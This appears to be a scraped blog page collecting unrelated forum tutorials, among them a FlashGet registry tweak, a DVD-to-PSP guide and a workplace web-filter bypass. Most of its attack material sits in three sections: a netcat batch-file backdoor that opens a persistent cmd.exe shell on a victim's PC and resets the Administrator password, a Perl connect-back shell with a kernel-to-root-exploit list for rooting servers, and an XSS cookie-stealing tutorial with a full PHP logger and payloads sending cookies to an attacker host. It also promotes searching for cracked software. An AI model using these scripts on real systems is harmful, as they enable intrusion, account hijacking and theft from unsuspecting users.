Search for cracked software on Google with this simple trick.
just type crack: app name
example: crack: flashget 1.6a
http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=crack%3A+flashget+1.6a
Flashget Broadband Tweak
Just double-click on the FlashGetRegTweak.reg file to enter the tweak into the registry. This tweak will allow up to 100 simultaneous file downloads, each split into a max of 30 parts. Previous defaults were 8 & 10 respectively.
Note:
1. Works for dialup but not really advantageous.
2. Restart your computer to feel the full advantage of this tweak.
Download:
here it is
just copy to notepad
rename to Iwillsinglehandedlykillallthebandwidthfromtheserversidownloadfrom.reg
REGEDIT4
[HKEY_CURRENT_USER\Software\JetCar\JetCar\General]
"Max Parallel Num"="100"
"MaxSimJobs"="100"
Converting Movies To Psp Format.
Hey again, this is a real quick guide for anyone interested to get a movie onto there PSP without all the fluff i have seen elsewhere. I just watched Africa the Serengeti on my PSP and heres is the lowdown.
Movie - approx 40 minutes - dvd
Saved to hard drive - 2.6GIG - using DVD Decryptor (free program) try google
Transfered to avi format - 377MB- using Super DVD Ripper (9 FREE trial uses) then you must buy
Transfered to MP4 - 37MB - using the (basically free) Image convertor 2
Average movie breakdown - using above as a guide only.
so im guessing the average movie may be 4.5gig for example
saved to 800MB
CONVERTED TO 70-80MB
Ok use DVD decryptor to save the movie to your hard drive eg. C:\africa (it will save it for you as described)
When completed find the folder c:\africa on your computer and find the vob file in that folder - generally the largest one and right click and play it with your dvd program to see what part it is. If its the correct movie part you now know thats the one you need.
Once you have located the vob file you want to transfer open DVD Ripper and go to wizard icon. There you will see an icon of VOB to AVI button. Click it and then it will ask to locate the file. Locate the file and click it. It will SCAN THE FILE(just wait till that finishes) a parameter box opens next and just click the arrow. It then askes to choose output file, click the file icon and locate the correct fob file. It then askes for file compression - choose microsoft windows media and then click ok Then press the start button. It will now convert the vob into avi format.
(there are also other opions ie;dvd to avi etc) I have only used the vob to avi for this test.
After DVD ripper has transferred the file it will save it to the same folder as the original move was in eg: c:\africa\viteots. Open the file and you will now see an AVI icon containing the movie.
Make sure you PSP is on and in usb mode then Open Image convertor 2 and press on movie / add to list. For this example i click on C:drive the found the folder Africa and opened it and there was my converted AVI file. Click the file press ok and it will be transfered to your PSP for viewing pleasure.
*****Note**** i only converted one VOB file as thatS all there was for this particular movie. If you have more then one vob file you may need to try the dvd to avi when you rip. This is just a guide i worked out to compress dvd into the smallest possible file so you can get value out of a 512 card.
QUOTE
http://www.crazyhatsoftware.com/ImageConverter2.1.exe
Image Converter 2.1 JAP translated to ENG.
I wrote this because it really worked for me a few times and I hope it does for you too, all you need is very a gullible target.
As we all know, a Trojan is very likely to be picked up by AV, what you need is Netcat, netcat opens a port on a computer for access (If used correctly by a batch file you open a port on a target computer). You will need to write a batch file. The batch file to copy netcat on the remote computer will have to be run from the target computer (The person on the target will have to execute the batch file in some way). Open Notepad and type this in: Save the file as a batch file using Notepad.Code: @echo off
cd\
xcopy \\yourIP\shared folder\netcat.exe
copy \\yourIP\shared folder\netcat.exe (just to be sure)
cd "Documents and Settings"
cd "All Users"
cd "Start Menu"
cd Programs
cd Startup
xcopy \\yourIP\shared folder\Startup.bat (This is another batch file you will write)
cd\
netcat.exe -L -p 9999 -d -e cmd.exe
The next batch file will be used to make sure the port you specified opens up every time windows starts up, you can specify any port you wish. Open Notepad and type: Save the file as a batch file using Notepad, this will be the file that is copied into the startup folder in the previous batch file we wrote. You can bind the batch file to another file and share that file, let the target execute that file so that he can copy netcat and the other batch file onto his/hers computer thus opening port 9999, after port 9999 has been opened you can then use telnet and telnet to that port on the target computer to have full access without ever needing any passwords of any sort. After you are in change the Administrator password for if something happens to your files, the command is this:Code: @echo off
cd\
netcat.exe -L -p 9999 -d -e cmd.exe
net user Administrator newpassword
Now from here you can do what you want, e.g try shutting down the target computer by browsing to his system32 folder and then type in:
shutdown -r -t 10 -c "Hello"
the computer will then restart in 10 seconds time. You can even play around more by Installing Cain & Abel on your computer and then installing Abel remotely on his computer (Since you know the Administrator password) Once you have Abel on the target you can start and stop services and do more!
Enjoy.
Hello Everyone and welcome to my tutorial on rooting boxes!! Today you will learn one of many methods to rooting an "insecure" box. Obviously if you are reading this I don't think you will be using any 0-day kernel exploits :P. So basic things you will need for this tutorial to work for you will be the following:
Shell Access on a website is the first thing you will need. How you gain this access is entirely up to you. I would say most people will end up going with a simple remote file inclusion and place yourself a c99, r57, locust or any shell of your choice.
You will want to get yourself a version of NetCat Which you can find at this location
http://www.vulnwatch.org/netcat/nc111nt.zip
If you have an antivirus that auto deletes infected files or virii i would suggest disabling it as some av's will detect netcat as a hacktool or remote admin tool. Once you have downloaded netcat open netcat up and it will ask you to enter a string for the command line. Reading up on netcat is recommended but if your lazy a string like this will do just fine From there you will want to aquire a nice back-connect. I preffer to use one thats not in the shell because i find that those back connects work shitty so i will provide you with one that i use. Very simple to use just save as "bc.pl" then upload to server and end execute.Code: -vv -l -n -p
Code: perl bc.pl
**Note that if you are running a router or wireless on multiple ips set by your dhcp you might have to forward the Code: PERL #!/usr/bin/perl
use IO::Socket;
# Priv8 ** Priv8 ** Priv8
# IRAN HACKERS SABOTAGE Connect Back Shell
# code by:LorD
# We Are :LorD-C0d3r-NT-\x90
# Email:LorD@ihsteam.com
#
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host
#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/bash';
$ARGC=@ARGV;
print "IHS BACK-CONNECT BACKDOOR\n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "IHS BACK-CONNECT BACKDOOR \n\n";
system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo;
echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF
http://portforward.com/routers.htm
So Now that you have your tools and you have your shell access open up netcat and type in -vv -l -n -p 8080 for this tutorial we will connect on port 8080. Hit enter and it should start listening.
Go back to the server and upload your bc.pl. Execute the back connect with a command such as perl bc.pl Once executed you will see something probably similar toCode: uname -a;id
The important information here that you want is the OS & Kernel Ver. which in this case would be Linux and the kernel ver. is 2.6.8-2 and you can see the last update of it was in 2005 so it's fairly old. which is a good thing for us.Code: Linux alexandra.adm24.de 2.6.8-2-686-smp #1 SMP Tue Aug 16 12:08:30 UTC 2005 i686 GNU/Linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Here is a kernel refrence for you all this will tell you what exploits work for the differenet kernels. Just to give you a general idea. note that this refrence is kind of old but is still pretty accurate but there could be newer exploits now. Once you have found the Kernel ver. of the server you are about to root you need to find the Local Root Exploit for that kernel which you can find with google using the list above. Once you have found your Exploit you will want to compile it assuming it's in c which most are. To compile your xpl.c what you want to do is place the xpl.c on the server where you placed you bc.pl and then compile it. To Compile your c scripts go to your shell that you have spawned with netcat and type:Code: 2.2 -> ptrace
2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl
2.6.23 - 2.6.24 -> diane_lane_******_hard.c
2.6.17 - 2.6.24-1 -> jessica_biel_naked_in_my_bed.c
ex: This will compile your xpl.c to a file named xpl.Code: gcc xpl.c -o xpl
From here now all you have to do is run your exploit which can be done by simply typing in your netcat connection It should execute the exploit file which you have just compiled and give you root depending on what the exploit requires. Some require nothing but running them. Others such as h0llyshit require a large file to exploit or to be made to exploit but this is just to explain how to root. you can read up on h0llyshit from here if you would like.Code: ./xpl
I know that there are many other methods to rooting boxes but this is one method that is people can use that is fairly easy to follow. If you have any comments about the method feel free to ask but please don't knock it down. If you do not like this method thats fine you can write a tutorial for everyone using your own method.
Hope you enjoyed this tutorial and i hope it was helpful to you.
Tutorial by w3tw0rk shoutz to rootshell security team
http://www.rootshell-team.com
Welcome to the new generation of Search Engines. In this article, I wouldn't concentrate much about search engines. This article borned because of my office needs. In my office, I wasn't able to access all the sites. only few sites were accessible including some "tech support forums", "Microsoft" etc. etc. In this case, most of us try to use the proxy websites. In this article, I will discuss few ways with which your office people would block your internet access and A NEW & Fresh way which will get you the access back.
Ways with which your company's IT dept. may block your internet connection
Note:- There might be otherways but these are the widely used ways.
1. Keyword Tracking:
In this method, there is no specific software which blocks the website. Whenever you open up a website, its "index" is crawled in this method. Depending on the text of the website, it will be categorized on the server. Few categories will be allowed by your IT dept. like "computers & internet" which are necessary in any comapny. Most of the categories will be blocked like "person & dating" "adult & sexuality".
Even "iframe" are crawled in this method. So thats the reason proxies wouldn't work because, in proxy site first of all it will have words on it like proxy, access internet and all... so the website would be blocked under "proxies & translators" category. Even if you find a proxy website, which opens in your office, that wouldn;t work. Because the moment, you open "orkut.com" in that proxy site, on the next page the part which is supposed to open up orkut.com will say "blocked under category : personal & dating". So even working proxy wouldn't help you.
This concept is quite confusing to new people. But this is the strongest defense. In this type, you cant even use
2. Access Allow Softwares:
Most of you all know about it. Software blocking specific groups of websites. You can easily bypass it with SSH or some proxy sites. Even you can edit registry keys and gget your internet to work. So there nothing much to write about it.
3.Manual Blocking
This mainly happens in small companies and very easy to bypass. If you are little more then average in computers then you can edit the account permissions or remove the blocked sites from the list and get access.
The New Generation of Proxy
So, coming right at the point, Heres what helped me to bypass my company's keyword tracking type blockage. This is a new search engine, which lets you surf anonymously. As you know, most of the companies will allow Search Engines, so most likely you will have access to it. And if you do, then consider your work done.
Yauba.com ---- Is the URL of the search engine.
Steps to follow to view bocked sites:
Advantages:
Disadvantages:
Off topic:
Shabbir, you should remember me asking you lot of times that where do u host G4E, because i used to think that , my IT dept. works on the IP address of the websites. If it is dedicated IP then it will open, if its shared then it wont. Even I created few threads about it. Slowly i realised that it tracks the keyword. Luckily, at the same time this yauba got released. If you notice all other proxies encode the URLs as well, but yauba has got advanced encoding so even though the iframes are crawled it still works
I thought it was about time for someone to post a cookie stealing tutorial, so I decided to write one for you from the ground up.
NOTE: Again... this was written to educate you on the security aspects of the following information, not to teach you how to break the law or do something stupid. Use what you learn from this to make your website more secure/use better browsing habits, not break into other websites.
Background
First, make sure you've read these two articles because I'm going to assume you already understand everything written in them:
XSS Complete Guide
All About Cookies and Security
Now we need to understand a bit more about how XSS actually works before moving on. From the above article, you already know a bit of the theory behind XSS, so we'll get right to the code. Let's say a web page has a search function that uses this code:
Code:
<tr><td>Name</td><td><input type="text" name="advisor_name" value=""></td></tr>
We want to exploit this page using XSS. How do we do that? We know that we want to inject our own script into the value field (this field is tied to the search box we can enter text into). We could start by using a test script:
Code:
<script>alert("test")</script>
When we enter this into the search box and click search, nothing happens. Why? It's still inside the value quotes, which turn the entire script into plaintext. If you look at the page source now, you see that the above portion of code now looks like this:
Code:
<tr><td>Name</td><td><input type="text" name="advisor_name" value="<script>alert("test")</script>"></td></tr>
Note the quotes around our script. So what do we do? We need to end the value field before our script can actually be executed. So we tweak our test injection a bit:
Code:
"><script>alert("test")</script>
This should close the quotes end the input section so that our script can be rendered as a part of the source instead of plaintext. And now when we hit enter we get a nice pop-up box saying "test", showing us our script was executed. Keep in mind that you're not actually writing this data to the server (unless you're injecting it with a script that actually modifies the page on the server's end also, like a guestbook or comment script), just changing how the dynamic page is acting on your end. If you want someone else to see what you see when you use this injection, you need to send them the link with that injection already in the page. For example,
Code:
http://www.site.com/search.php?q="><script>alert("test")</script>
Of course, if you don't want the recipient to see the injection, you'll need to hex the query. You can do that here:
Code:
http://centricle.com/tools/ascii-hex/
Hexing the query of this url gives us
Code:
http://www.site.com/search.php?q=%22%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%74%65%73%74%22%29%3c%2 f%73%63%72%69%70%74%3e
The above is a very simple case of finding an XSS injection vulnerability. Some html and javascript knowledge is definitely helpful for finding more complicated ones, but code like the above works often enough.
Using XSS to Steal Cookies
OK, so now you know the page is vulnerable to XSS injection. Great. Now what? You want to make it do something useful, like steal cookies. Cookie stealing is when you insert a script into the page so that everyone that views the modified page inadvertently sends you their session cookie. By modifying your session cookie (see the above linked tutorial), you can impersonate any user who viewed the modified page. So how do you use XSS to steal cookies?
The easiest way is to use a three-step process consisting of the injected script, the cookie recorder, and the log file.
First you'll need to get an account on a server and create two files, log.txt and whateveryouwant.php. You can leave log.txt empty. This is the file your cookie stealer will write to. Now paste this php code into your cookie stealer script (whateveryouwant.php):
Code:
<?php
function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}
function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();
$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");
if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
fclose($log);
}
logData();
?>
This script will record the cookies of every user that views it.
Now we need to get the vulnerable page to access this script. We can do that by modifying our earlier injection:
Code:
"><script language= "JavaScript">document.location="http://yoursite.com/whateveryouwant.php?cookie=" + document.cookie;document.location="http://www.whateversite.com"</script>
yoursite.com is the server you're hosting your cookie stealer and log file on, and whateversite.com is the vulnerable page you're exploiting. The above code redirects the viewer to your script, which records their cookie to your log file. It then redirects the viewer back to the unmodified search page so they don't know anything happened. Note that this injection will only work properly if you aren't actually modifying the page source on the server's end. Otherwise the unmodified page will actually be the modified page and you'll end up in an endless loop. While this is a working solution, we could eliminate this potential issue when using source-modifying injections by having the user click a link that redirects them to our stealer:
Code:
"><a href="#" onclick="document.location='http://yoursite.com/whateveryouwant.php?cookie=' +escape(document.cookie);"><Click Me></a></script>
This will eliminate the looping problem since the user has to cilck on it for it to work, and it's only a one-way link. Of course, then the user's trail ends at your cookie stealing script, so you'd need to modify that code a little to keep them from suspecting what's going on. You Could just add some text to the page saying something like "under construction" by changing the end of our php script from this:
Code:
logData();
?>
to this:
Code:
logData();
echo '<b>Page Under Construction</b>'
?>
Now when you open log.txt, you should see something like this:
Code:
IP: 125.16.48.169 | PORT: 56840 | HOST: | Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/2009032711 Ubuntu/8.10 (intrepid) Firefox/3.0.8 | METHOD: | REF: http://www.ifa.org.nz/search.php |
DATE: Tuesday 21st 2009f April 2009 05:04:07 PM | COOKIE: cookie=PHPSESSID=889c6594db2541db1666cefca7537373
You will most likely see many other fields besides PHPSESSID, but this one is good enough for this example. Now remember how to edit cookies like I showed you earlier? Open up firebug and add/modify all your cookie's fields to match the data from the cookie in your log file and refresh the page. The server thinks you're the user you stole the cookie from. This way you can log into accounts and many other things without even needing to know the passwords or usernames.
Summary
So in summary:
1. Test the page to make sure it's vulnerable to XSS injections.
2. Once you know it's vulnerable, upload the cookie stealer php file and log file to your server.
3. Insert the injection into the page via the url or text box.
4. Grab the link of that page with your exploited search query (if injection is not stored on the server's copy of the page).
5. Get someone to use that link if necessary.
6. Check your log file for their cookie.
7. Modify your own cookie to match the captured one and refresh the page.
References
I originally posted this article on TechMafias.com but reposted it here for the go4expert community.
Code:
http://techmafias.com/forum/Thread-tutorial-cookie-stealing-with-xss
Subscribe to:
Posts (Atom)
FEEDJIT Recommended Reading
